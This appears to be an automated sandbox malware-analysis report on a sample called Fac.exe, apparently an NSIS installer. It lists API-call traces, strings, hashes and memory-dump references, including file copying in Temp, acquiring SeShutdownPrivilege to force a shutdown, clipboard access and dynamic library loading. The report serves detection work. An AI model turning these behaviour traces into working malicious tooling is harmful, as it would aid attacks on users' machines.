lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Fac.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Fac.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
CopyFileW.KERNEL32(C:\Users\user\Desktop\Fac.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 0040357F, 0040369F, 00403749, 00403753
\Temp, xrefs: 004035B3
"C:\Users\user\Desktop\Fac.exe", xrefs: 00403430, 00403436, 0040362A
Low, xrefs: 004035CF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 004036AA
Error launching installer, xrefs: 00403684
SeShutdownPrivilege, xrefs: 00403823
.tmp, xrefs: 00403715
C:\Users\user\AppData\Local\Temp\, xrefs: 00403591, 00403596, 004035AC, 004035B8, 004035C7, 004035D4, 004035E0, 004035E8, 004036FE, 0040370F, 0040371A, 00403726, 00403733, 00403742, 004037F3
C:\Users\user\Desktop\Fac.exe, xrefs: 004037AC
~nsu, xrefs: 004036F9
TEMP, xrefs: 004035E1
TMP, xrefs: 004035E9
C:\Users\user\Desktop, xrefs: 00403720, 00403725, 00403752
NSIS Error, xrefs: 0040341B
1033, xrefs: 004035FD
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Fac.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$C:\Users\user\Desktop$C:\Users\user\Desktop\Fac.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3840050921
Opcode ID: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: 3b799489f38086b66f8157c52dfdd850dbfcc699f0e2a59af50d3155f203b837
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(00000002), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
ShowWindow.USER32(?,00000008), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNELBASE(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,00000008), ref: 00405629
ShowWindow.USER32(00000008), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

6B, xrefs: 00405719
{, xrefs: 00405691

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: eda15b0fa8e85a5ee056dfe18a98c225c15b93093155cbe620ec270875def271
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Function 70171B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 7017121B: GlobalAlloc.KERNEL32(00000040,?,7017123B,?,701712DF,00000019,701711BE,-000000A0), ref: 70171225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70171C6F
lstrcpyW.KERNEL32(00000008,?), ref: 70171CB7
lstrcpyW.KERNEL32(00000808,?), ref: 70171CC1
GlobalFree.KERNEL32(00000000), ref: 70171CD4
GlobalFree.KERNEL32(?), ref: 70171DB6
GlobalFree.KERNEL32(?), ref: 70171DBB
GlobalFree.KERNEL32(?), ref: 70171DC0
GlobalFree.KERNEL32(00000000), ref: 70171FAA
lstrcpyW.KERNEL32(?,?), ref: 70172144
GetModuleHandleW.KERNEL32(00000008), ref: 701721B9
LoadLibraryW.KERNEL32(00000008), ref: 701721CA
GetProcAddress.KERNEL32(?,?), ref: 70172224
lstrlenW.KERNEL32(00000808), ref: 7017223E

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 19a53319f79b07432dc921d4f1837e6f7aa864640a9dfa226e3af7d2d66e56f1
Instruction ID: 302ae3e6bca9c18fd4822f49c25b6712e2dc08484e52dfb49ddc1a63a540fdde
Opcode Fuzzy Hash: 19a53319f79b07432dc921d4f1837e6f7aa864640a9dfa226e3af7d2d66e56f1
Instruction Fuzzy Hash: 1822BE71D04209DECB22CFA8C8846EDB7F9FB04315F62E56EE196E3680D7709A85DB50

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 004059BF
lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 00405A07
lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 00405A2A
lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 00405A30
FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,77293420,00000000), ref: 00405A40
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
FindClose.KERNEL32(00000000), ref: 00405AEF

Strings

"C:\Users\user\Desktop\Fac.exe", xrefs: 00405996
\*.*, xrefs: 00405A01
C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Fac.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1730668926
Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,77293420,004059B6,?,C:\Users\user\AppData\Local\Temp\,77293420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,00000001), ref: 00403E95
GetDlgItem.USER32(?,00000002), ref: 00403E9F
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
GetDlgItem.USER32(?,00000003), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,0000000A), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 6B
API String ID: 3282139019-4127139157
Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77293420,"C:\Users\user\Desktop\Fac.exe",00000000), ref: 004039F5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(Call), ref: 00403A93
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab), ref: 00403ADC

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(00000005,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

6B, xrefs: 004039A0
.DEFAULT\Control Panel\International, xrefs: 004039E0
RichEd32, xrefs: 00403BB0
_Nb, xrefs: 00403AF8, 00403B60
.exe, xrefs: 00403A82
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 00403A04, 00403A0C, 00403AAF, 00403AB5, 00403AC5
"C:\Users\user\Desktop\Fac.exe", xrefs: 00403978
Call, xrefs: 00403A3C, 00403A45, 00403A53, 00403AA2, 00403AA8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403980
RichEdit20W, xrefs: 00403BC0, 00403BC6
RichEd20, xrefs: 00403BA2
1033, xrefs: 00403994, 004039F0
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8
RichEdit, xrefs: 00403BCF

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Fac.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-2968134610
Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Fac.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fac.exe,C:\Users\user\Desktop\Fac.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
Inst, xrefs: 00402FC2
"C:\Users\user\Desktop\Fac.exe", xrefs: 00402EDD
soft, xrefs: 00402FCB
Error launching installer, xrefs: 00402F2D
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
C:\Users\user\Desktop\Fac.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
Null, xrefs: 00402FD4
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
